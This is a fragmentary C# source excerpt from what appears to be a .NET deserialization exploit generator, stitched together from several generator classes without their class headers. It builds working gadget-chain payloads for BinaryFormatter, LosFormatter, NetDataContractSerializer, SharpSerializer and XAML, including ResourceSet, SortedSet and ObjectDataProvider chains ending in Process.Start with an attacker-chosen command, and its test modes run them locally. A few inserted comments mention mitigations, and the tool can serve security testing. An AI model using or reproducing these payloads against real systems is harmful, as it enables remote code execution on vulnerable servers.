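                  ""Assembly"": {
                    ""Name"": ""mscorlib"",
                    ""Version"": ""4.0.0.0"",
                    ""Culture"": ""neutral"",
                    ""PublicKeyToken"": ""b77a5c561934e089""
                  }
                },
                ""Value"": """ + internalPayload + @"""
              }
            ]
          }
    }
  }";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
                        serializer.UnPickleOfString <Object>(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "sharpserializerbinary")
            {
                // Binary Serialization Mode - the only branch that returns a non-string object.
                // Note: this test path has no try/catch, so a deserialization failure propagates to the caller.
                object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd);
                if (inputArgs.Test)
                {
                    SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData);
                }
                return(serializedData);
            }
            else if (formatterName == "sharpserializerxml")
            {
                // XML Serialization Mode
                // Note: this test path has no try/catch, so a deserialization failure propagates to the caller.
                string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
                if (inputArgs.Test)
                {
                    SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData);
                }
                return(serializedData);
            }
            else
            {
                // Specific exception type instead of a bare Exception; message kept unchanged for existing callers.
                throw new NotSupportedException("Formatter not supported");
            }
        }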
        /// <summary>
        /// Builds a serialized <c>System.Resources.ResourceSet</c> wrapper around a command-launching
        /// gadget for the "binaryformatter", "losformatter" and "netdatacontractserializer" formatters.
        /// With <c>internalgadget == 1</c> the inner object is the SortedSet / ComparisonComparer /
        /// DelegateSerializationHolder chain that resolves to <c>Process.Start(string, string)</c>;
        /// otherwise it is a <c>TextFormattingRunProperties</c> whose <c>ForegroundBrush</c> carries an
        /// ObjectDataProvider XAML string produced by <see cref="ObjectDataProviderGenerator"/>.
        /// Defensive note: every branch relies on the receiving deserializer resolving arbitrary type
        /// names from the stream; the mitigation on that side is a type-restricted serializer, or not
        /// feeding untrusted input to BinaryFormatter / LosFormatter / NetDataContractSerializer at all.
        /// </summary>
        /// <param name="formatter">Formatter name, compared case-insensitively.</param>
        /// <param name="inputArgs">Command plus the Minify / Test / UseSimpleType flags. For
        /// "netdatacontractserializer" its <c>CmdType</c> is set to XML as a side effect.</param>
        /// <returns>A <c>byte[]</c> for "binaryformatter" and "losformatter", a <c>string</c> for
        /// "netdatacontractserializer".</returns>
        /// <exception cref="Exception">Thrown when <paramref name="formatter"/> is none of the above.</exception>
        public override object Generate(string formatter, InputArgs inputArgs)
        {
            /*
             * // This is how ResourceSet can be used directly but the payload would fire!
             * object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
             *
             * using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources"))
             * {
             *  rw.AddResource("", generatedPayload);
             *  rw.Generate();
             *  rw.Close();
             * }
             *
             * // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this
             * ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources");
             *
             * // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it
             *
             * //*/

            //TestMore(inputArgs);

            if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
                formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
            {
                string payload = "";
                // This to prevent code execution when running
                byte[] bfSerializedObj;

                // internalgadget selects between a hand-assembled MS-NRBF record list
                // (SimpleBinaryFormatterParser) and a JSON record description that
                // AdvancedBinaryFormatterParser turns into the same kind of stream.
                if (internalgadget == 1)
                {
                    // This is an example of using SimpleBinaryFormatterParser
                    //
                    string obj25Type = "", obj25Value = "", obj26Value = "";

                    // Record 26 is a BinaryObjectString (0x06) with object id 0x0c whose body is the
                    // 7-bit-length-prefixed command file name.
                    byte[] cmdFile7bitLV   = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName);
                    byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 };
                    obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV));

                    // Record 25 carries the arguments. With arguments it is another BinaryObjectString
                    // (0x06, object id 0x0b); without, it is a MemberReference (0x09) to object id 5,
                    // which record 13 below defines as an empty string.
                    if (inputArgs.HasArguments)
                    {
                        byte[] obj25TypeByte   = new byte[] { 0x06 };
                        byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 };
                        byte[] cmdArgs7bitLV   = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments);

                        obj25Type  = Convert.ToBase64String(obj25TypeByte);
                        obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV));
                    }
                    else
                    {
                        byte[] obj25TypeByte   = new byte[] { 0x09 };
                        byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 };

                        obj25Type  = Convert.ToBase64String(obj25TypeByte);
                        obj25Value = Convert.ToBase64String(obj25ValueObjId);
                    }

                    // Record list consumed by SimpleBinaryFormatterParser.JsonToStream: typeBytes is the
                    // MS-NRBF record type (null = untyped primitive member), valueBytes its base64 body.
                    // Records 25 and 26 are spliced in from the values computed above.
                    payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAA
AA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==
','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}";

                    bfSerializedObj = SimpleBinaryFormatterParser.JsonToStream(payload).ToArray();
                }
                else
                {
                    // This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer

                    // In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first
                    ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();

                    // GenerateWithNoTest presumably skips the inner generator's own Test step so the
                    // command is not executed while this payload is being assembled — confirm in that class.
                    string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();

                    if (inputArgs.Minify)
                    {
                        xaml_payload = XMLMinifier.Minify(xaml_payload, null, null, null);
                    }

                    // The XAML is embedded as the value of a JSON string (record 13 below), so it must be
                    // JSON-escaped first; the NetDataContractSerializer branch uses CDATA instead.
                    xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload);

                    // This payload has been minified manually too by removing some of the unnecessary items!
                    // Record ids 1-14 describe: stream header, ResourceSet (objectId 1) -> Hashtable
                    // (objectId 2) -> TextFormattingRunProperties (objectId 6, assemId 7 =
                    // Microsoft.PowerShell.Editor) whose ForegroundBrush is the string objectId 8.
                    payload = @"[{'Id': 1,
    'Data': {
      '$type': 'SerializationHeaderRecord',
      'binaryFormatterMajorVersion': 1,
      'binaryFormatterMinorVersion': 0,
      'binaryHeaderEnum': 0,
      'topId': 1,
      'headerId': -1,
      'majorVersion': 1,
      'minorVersion': 0
}},{'Id': 2,
    'TypeName': 'ObjectWithMapTyped',
    'Data': {
      '$type': 'BinaryObjectWithMapTyped',
      'binaryHeaderEnum': 4,
      'objectId': 1,
      'name': 'System.Resources.ResourceSet',
      'numMembers': 2,
      'memberNames':['',''],
      'binaryTypeEnumA':[3,3],
      'typeInformationA':[null,null],
      'typeInformationB':['',''],
      'memberAssemIds':[0,0],
      'assemId': 0
}},{'Id': 3,
    'TypeName': 'MemberReference',
    'Data': {
      '$type': 'MemberReference',
      'idRef': 2
}},{'Id': 4,
    'TypeName': 'ObjectNull',
    'Data': {
      '$type': 'ObjectNull',
      'nullCount': 1
}},{'Id': 5,
    'TypeName': 'ObjectWithMapTyped',
    'Data': {
      '$type': 'BinaryObjectWithMapTyped',
      'binaryHeaderEnum': 4,
      'objectId': 2,
      'name': 'System.Collections.Hashtable',
      'numMembers': 5,
      'memberNames':['LoadFactor','Version','Comparer','','HashSize'],
      'binaryTypeEnumA':[0,0,3,3,0],
      'typeInformationA':[11,8,null,null,8],
      'typeInformationB':[11,8,'','',8],
      'memberAssemIds':[0,0,0,0,0],
      'assemId': 0
}},{'Id': 6,
    'TypeName': 'Single',
    'IsPrimitive': true,
    'Data': {
      '$type': 'MemberPrimitiveUnTyped',
      'typeInformation': 11,
      'value': 0
}},{'Id': 7,
    'TypeName': 'Int32',
    'IsPrimitive': true,
    'Data': {
      '$type': 'MemberPrimitiveUnTyped',
      'typeInformation': 8,
      'value': 1
}},{'Id': 8,
    'TypeName': 'ObjectNull',
    'Data': {
      '$type': 'ObjectNull',
      'nullCount': 1
}},{'Id': 9,
    'TypeName': 'ObjectNull',
    'Data': {
      '$type': 'ObjectNull',
      'nullCount': 1
}},{'Id': 10,
    'TypeName': 'Int32',
    'IsPrimitive': true,
    'Data': {
      '$type': 'MemberPrimitiveUnTyped',
      'typeInformation': 8,
      'value': 3
}},{'Id': 11,
    'TypeName': 'Assembly',
    'Data': {
      '$type': 'BinaryAssembly',
      'assemId': 7,
      'assemblyString': 'Microsoft.PowerShell.Editor'
}},{'Id': 12,
    'TypeName': 'ObjectWithMapTypedAssemId',
    'Data': {
      '$type': 'BinaryObjectWithMapTyped',
      'binaryHeaderEnum': 5,
      'objectId': 6,
      'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties',
      'numMembers': 1,
      'memberNames':['ForegroundBrush'],
      'binaryTypeEnumA':[1],
      'typeInformationA':[null],
      'typeInformationB':[null],
      'memberAssemIds':[0],
      'assemId': 7
}},{'Id': 13,
    'TypeName': 'ObjectString',
    'Data': {
      '$type': 'BinaryObjectString',
      'objectId': 8,
      'value': '" + xaml_payload + @"'
}},{'Id': 14,
    'TypeName': 'MessageEnd',
    'Data': {
      '$type': 'MessageEnd'
}}]";

                    bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray();
                }

                if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
                {
                    // Test mode hands the bytes to the real BinaryFormatter. Since the gadget starts a
                    // process during deserialization, expect the configured command to run on this
                    // machine (the author's commented-out ResourceSet notes above describe the same effect).
                    if (inputArgs.Test)
                    {
                        try
                        {
                            // NOTE(review): ms is never disposed; a using declaration would be idiomatic.
                            MemoryStream ms = new MemoryStream(bfSerializedObj);
                            ms.Position = 0;
                            System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
                            bf.Deserialize(ms);
                        }
                        catch (Exception err)
                        {
                            Debugging.ShowErrors(inputArgs, err);
                        }
                    }
                    return(bfSerializedObj);
                }
                else
                {
                    // it is LosFormatter
                    // LosFormatter output is the same BinaryFormatter stream re-wrapped by
                    // BFStreamToLosFormatterStream, so the gadget chain is unchanged.
                    byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj);

                    // NOTE(review): the stream is allocated even when Test is false and is never disposed.
                    MemoryStream ms = new MemoryStream(lfSerializedObj);
                    ms.Position = 0;
                    if (inputArgs.Test)
                    {
                        try
                        {
                            // Same caveat as the BinaryFormatter test above: this runs the gadget locally.
                            System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
                            lf.Deserialize(ms);
                        }
                        catch (Exception err)
                        {
                            Debugging.ShowErrors(inputArgs, err);
                        }
                    }
                    return(lfSerializedObj);
                }
                //return Serialize(myResourceSet, formatter, inputArgs);
            }
            else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase))
            {
                // Side effect on the caller's inputArgs: CmdType presumably controls how CmdFileName
                // and CmdArguments are escaped for XML inside CommandArgSplitter — verify there.
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                string ndcPayload = "";

                if (internalgadget == 1)
                {
                    string cmdPart = "";

                    // The two strings become the SortedSet Items that the Comparison delegate
                    // (Process.Start(string, string)) receives; without arguments the first slot is an
                    // xsi:nil string rather than being omitted, keeping b:Size="2" truthful.
                    if (inputArgs.HasArguments)
                    {
                        cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>";
                    }
                    else
                    {
                        cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>";
                    }

                    // Inline NetDataContractSerializer form of the SortedSet / ComparisonComparer /
                    // DelegateSerializationHolder chain; b:Ref attributes point back at earlier b:Id strings
                    // (1 = mscorlib, 2 = Compare, 3 = System.String, 4 = Start, 5 = System assembly, 6 = Process).
                    ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly 
b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>";
                }
                else
                {
                    ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();

                    string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();

                    if (inputArgs.Minify)
                    {
                        xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
                    }

                    // TextFormattingRunProperties variant: the XAML is placed in ForegroundBrush as CDATA,
                    // so unlike the BinaryFormatter branch no JSON escaping is applied here.
                    ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>";
                    //</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm!
                }

                if (inputArgs.Minify)
                {
                    // The trailing closing tags are passed as discardable in both cases (see the author's
                    // note above); UseSimpleType additionally names the assemblies whose qualifiers the
                    // minifier may simplify — presumably mscorlib and Microsoft.PowerShell.Editor only.
                    if (inputArgs.UseSimpleType)
                    {
                        ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
                    }
                    else
                    {
                        ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
                    }
                }

                if (inputArgs.Test)
                {
                    // Same caveat as the BinaryFormatter test: the real NetDataContractSerializer is used,
                    // so expect the gadget to run locally.
                    try
                    {
                        SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload);

                        /*
                         * MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload));
                         * ms.Position = 0;
                         * ndcs.Deserialize(ms);
                         */
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }

                return(ndcPayload);
                //return Serialize(myResourceSet, formatter, inputArgs);
            }
            else
            {
                // NOTE(review): NotSupportedException (or ArgumentException on formatter) would be more
                // specific than the base Exception while still being caught by existing catch (Exception).
                throw new Exception("Formatter not supported");
            }
        }
        public override object Generate(string formatter, InputArgs inputArgs)
        {
            // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
            if (formatter.ToLower().Equals("xaml") || formatter.ToLower().Equals("xaml2"))
            {
                ProcessStartInfo psi = new ProcessStartInfo();

                psi.FileName = inputArgs.CmdFileName;
                if (inputArgs.HasArguments)
                {
                    psi.Arguments = inputArgs.CmdArguments;
                }

                StringDictionary dict = new StringDictionary();
                psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
                Process p = new Process();
                p.StartInfo = psi;
                ObjectDataProvider odp = new ObjectDataProvider();
                odp.MethodName           = "Start";
                odp.IsInitialLoadEnabled = false;
                odp.ObjectInstance       = p;

                string payload = "";

                if (formatter.ToLower().Equals("xaml2"))
                {
                    ResourceDictionary myResourceDictionary = new ResourceDictionary();
                    myResourceDictionary.Add("", odp);
                    payload = XamlWriter.Save(myResourceDictionary);
                }
                else
                {
                    payload = XamlWriter.Save(odp);
                }

                if (inputArgs.Minify)
                {
                    // using discardable regex array to make it shorter!
                    payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.Xaml_deserialize(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            if (formatter.ToLower().Equals("json.net"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                string cmdPart = "";

                if (inputArgs.HasArguments)
                {
                    cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
                }
                else
                {
